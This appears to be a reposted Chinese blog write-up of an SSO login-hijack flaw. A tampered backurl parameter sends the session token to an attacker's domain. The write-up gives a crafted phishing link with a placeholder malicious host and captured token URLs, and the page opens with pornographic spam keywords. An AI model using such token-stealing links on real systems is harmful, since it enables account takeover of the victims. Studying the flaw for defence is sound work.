日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

sso登陆劫持漏洞(单点登录劫持,低危)

發布時間:2025/3/15 编程问答 17 豆豆
生活随笔 收集整理的這篇文章主要介紹了 sso登陆劫持漏洞(单点登录劫持,低危) 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

正文

參考資料:

  • 騰訊單點登錄系統跨域劫持漏洞

  • https://lvwei.me/passport.html#toc_8

sso單點登陸,用戶一次登陸,所有系統都可訪問。

sso設計目的是簡化登陸方式,可能有很多系統,但是多個系統都是一個機構的,每個系統每次都要分別登陸就很復雜。

舉個例子,OpenID是一個很流行的sso框架,

用戶提交1. openID 2.openID Provider(提供者)

網站重定向到openID provider認證,登陸成功后,再重定向回網站。

這里可以理解為,門衛不知道你是誰,然后讓你去某某處蓋章,你去蓋章完成后回到門衛處,門外驗證紅章沒問題就讓你通過。

案例

http://abc.com/public/pages/login/index.html?backurl=http%3A%2F%2Fabc.com%2FAccount%2FLogin%3FReturnUrl%3D%252f&app=YuLinTu

此處有一個參數backurl=abc.com,當修改此參數為backurl=abc.com.test

網頁向abc.com.test,也就是openID Provider(提供者)提交一串openID。

提交后,網頁提示無法連接abc.com.test,并且抓取到了一段數據包,包含了登陸成功的token。

由于客戶可以偽造openID Provider(提供者),此處產生了sso登陸劫持漏洞。下列的sid是token。如果使用以下token,再次訪問http://abc.com.test/Account/Login,可以發現已經登陸。

http://abc.com.test/Account/Login?ReturnUrl=%2f&sid=c4d4e77e80ad1ee5c6828122a38b90d18077aeea4feb963a6c465e4691f65e767f11f935de6c3616

攻擊方式

攻擊者可以將backurl修改為自己的地址,然后發送惡意連接?http://abc.com/public/pages/login/index.html?backurl=http%3A%2F%2F惡意地址%2FAccount%2FLogin%3FReturnUrl%3D%252f&app=YuLinTu

一旦受害者點擊鏈接,并輸入正確的用戶名和密碼。惡意地址會收到如下的get請求“GET /Account/Login?ReturnUrl=%2f&sid=96c2182d0da29dc720fab468734fef9e47ced2993df16fda6b03c98e92f6e77475b4cf56623430d6 ”

攻擊者就可以使用token sid=xxx,以受害者的身份進行登陸abc.com。

總結

以上是生活随笔為你收集整理的sso登陆劫持漏洞(单点登录劫持,低危)的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。